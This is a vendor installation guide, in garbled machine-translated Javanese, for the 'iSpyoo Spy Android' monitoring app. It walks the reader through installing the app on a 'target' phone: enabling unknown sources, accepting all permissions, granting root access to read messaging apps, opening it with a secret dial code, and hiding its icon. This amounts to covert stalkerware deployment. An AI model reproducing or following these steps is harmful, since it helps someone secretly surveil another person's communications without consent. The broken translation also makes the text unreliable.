Guide Instalasi iSpyoo Spy Android

Welcome to iSpyoo Cell Phone Instalasi Guide Spy Android. Kita nganggep sing ditampa email sambutan karo aktifitas lan mlebu rincian supaya pandhuan iki bakal nggawa sampeyan liwat proses instalasi kanggo iSpyoo ing kabeh telpon Android.

Yen sampeyan duwe akses menyang target telpon Android, sampeyan siyap kanggo nginstal iSpyoo. Kanggo mangerteni carane, mung nonton video instalasi ngisor utawa tindakake langkah-langkah dening-guide kasedhiya ing kaca iki.

 

Watch Instalasi Video

——————————–UTAWA———————————-

 

Langkah Instalasi Guide Langkah

1. Ngatur Android

configure
Supaya kanggo nginstal iSpyoo ing telpon Android piranti sampeyan kudu ngeset telpon kanggo nampa aplikasi saka sumber sing ora dingerteni.

Kanggo padha supaya please mbukak Setelan, tunyuk Aplikasi lan ngaktifake Sumber ora dingerteni.

2. Download iSpyoo

Jlajah saka piranti lan download Instalasi iSpyoo Spy Android kanggo telpon. Or visit link http://ispyoo.com/download to choose your option for download APK file.

Nalika download lengkap mangga mbukak jendhela kabar lan nginstal saka ing kono.

 

3. Nginstal iSpyoo

Screenshot_2013-09-08-19-44-51
Nalika sampeyan instal iSpyoo telpon bakal pituduh kabeh ijin app perlu diinstal.

Mangga nampa wong-wong mau lan iSpyoo bakal diinstal kanthi otomatis.

4. Mbukak iSpyoo

Screenshot_2013-10-07-10-40-08
Sawise iSpyoo wis diinstal sampeyan bakal nemokake lambang anyar ing telpon. Utawa kanggo nggawe Nelpon #4779* kanggo mbukak iSpyoo.

 

5. Register piranti yen sampeyan anyar

Screenshot_2013-10-04-13-44-54
Sawise iSpyoo wis diinstal sampeyan bakal nemokake lambang anyar ing telpon.

Mbukak app anyar iki lan ketik alamat email lan sandhi kanggo ndhaftar piranti menyang akun.

6. Mlebet siji ana

Screenshot_2013-10-04-13-44-44
Sawise iSpyoo wis diinstal sampeyan bakal nemokake lambang anyar ing telpon.

Yen sampeyan duwe akun ing website iSpyoo.com wis, ingpals iki app anyar banjur ketik alamat email lan sandhi kanggo mlebu piranti menyang akun.

 

7. Nampa Yen bosok Piranti

Screenshot_2013-10-04-13-45-34
Yen piranti target bosok, mangga tunyuk “Nampa” kanggo gain ijin, kanggo nggunakake fungsi kaya samsung, Viber, Yahoo messeger…

8. Ngatur iSpyoo

iSpyoo Spy Android Installation
Sak uwise ndhaftar / mlebu ing iSpyoo kasil, mangga tunyuk “Konfigurasi…” tombol, kanggo nggawe Singidaken lambang utawa instal iSpyoo.